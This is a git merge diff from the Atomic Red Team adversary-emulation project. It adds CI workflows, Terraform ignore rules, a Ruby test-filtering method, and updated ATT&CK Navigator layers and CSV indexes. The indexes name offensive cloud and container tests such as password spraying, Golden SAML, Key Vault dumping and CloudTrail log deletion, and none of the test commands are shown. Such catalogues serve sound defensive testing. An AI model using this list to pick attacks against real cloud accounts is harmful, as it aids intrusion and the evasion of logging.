Merge branch 'master' into cloud-discovery

2023-02-28 13:23:09 -08:00
parent 1a12e7dc3e e56e34fac4
commit 052ae5d5ed
506 changed files with 820757 additions and 6582 deletions
@@ -0,0 +1,19 @@
+name: 'Close stale issues and PRs'
+on:
+  schedule:
+    - cron: '30 1 * * *'
+
+jobs:
+  stale:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/stale@v7
+        with:
+          stale-issue-message: 'This issue is stale because it has been open 30 days with no activity. Remove stale label or comment or this will be closed in 5 days.'
+          stale-pr-message: 'This PR is stale because it has been open 45 days with no activity. Remove stale label or comment or this will be closed in 10 days.'
+          close-issue-message: 'This issue was closed because it has been stalled for 5 days with no activity.'
+          close-pr-message: 'This PR was closed because it has been stalled for 10 days with no activity.'
+          days-before-issue-stale: 30
+          days-before-pr-stale: 45
+          days-before-issue-close: 10
+          days-before-pr-close: 10
@@ -20,3 +20,14 @@ jobs:
      - name: validate the format of atomics tests against the spec
        run: |
          bin/validate-atomics.rb
+
+  validate-terraform:
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@v3
+      - uses: hashicorp/setup-terraform@v2
+
+      - name: Terraform fmt
+        id: fmt
+        run: terraform fmt -recursive -check
+        continue-on-error: false
@@ -25,5 +25,34 @@ docs/_site/
 **/Invoke-AtomicTest-ExecutionLog.csv
 techniques_hash.db

-# Credential files 
-*.creds
+# Credential files
+*.creds
+
+# Local .terraform directories
+**/.terraform/*
+
+# .tfstate files
+*.tfstate
+*.tfstate.*
+**/*.terraform.lock.hcl
+
+# Crash log files
+crash.log
+crash.*.log
+
+# Ignore override files as they are usually used to override resources locally and so
+# are not checked in
+override.tf
+override.tf.json
+*_override.tf
+*_override.tf.json
+
+# Include override files you do wish to add to version control using negated pattern
+# !example_override.tf
+
+# Include tfplan files to ignore the plan output of command: terraform plan -out=tfplan
+# example: *tfplan*
+
+# Ignore CLI configuration files
+.terraformrc
+terraform.rc
@@ -1,7 +1,7 @@
 # <%= technique['identifier'] %> - <%= technique['name'] -%>

 ## [Description from ATT&CK](https://attack.mitre.org/techniques/<%= technique['identifier'].gsub(/\./, '/') %>)
-<blockquote><%= technique['description'] %></blockquote>
+<blockquote><%= technique['description'].gsub("%\\<", "%<") %></blockquote>

 ## Atomic Tests
 <% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
@@ -29,6 +29,29 @@ class AtomicRedTeam
    end
  end

+  #
+  # Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
+  #
+  def atomic_tests_for_technique_by_platform(technique_or_technique_identifier, platform)
+    technique_identifier = if technique_or_technique_identifier.is_a? Hash
+      ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
+    else
+      technique_or_technique_identifier
+    end
+
+    test_list = Array.new
+    atomic_tests.find do |atomic_yaml| 
+      if atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
+        atomic_yaml['atomic_tests'].each do |a_test|
+          if a_test["supported_platforms"].include?(platform[:platform])
+              test_list.append(a_test)
+          end
+        end
+      end
+    end
+    test_list
+  end
+
  #
  # Returns the individual Atomic Tests for a given identifer, passed as either a string (T1234) or an ATT&CK technique object
  #
@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure - adding user to Azure AD role\n- Azure - adding service principal to Azure AD role\n- AzureAD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
@@ -1 +1 @@
-{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]}
+{"name":"Atomic Red Team (Containers)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1053","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"comment":"\n- Container and ResourceDiscovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
+{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":5,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS - CloudWatch Log Stream Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":4,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- Azure - Eventhub Deletion\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
@@ -7,6 +7,6 @@ defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD
 privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
-persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
-persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
-persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
+persistence,T1098,Account Manipulation,4,Azure AD - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
+persistence,T1098,Account Manipulation,5,Azure AD - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
+persistence,T1098,Account Manipulation,8,Azure AD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
@@ -1,5 +1,7 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-credential-access,T1552.007,Kubernetes List Secrets,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
+discovery,T1613,Container and Resource Discovery,1,Container and ResourceDiscovery,8a895923-f99f-4668-acf2-6cc59a44f05e,sh
+credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
+credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
 persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
 execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
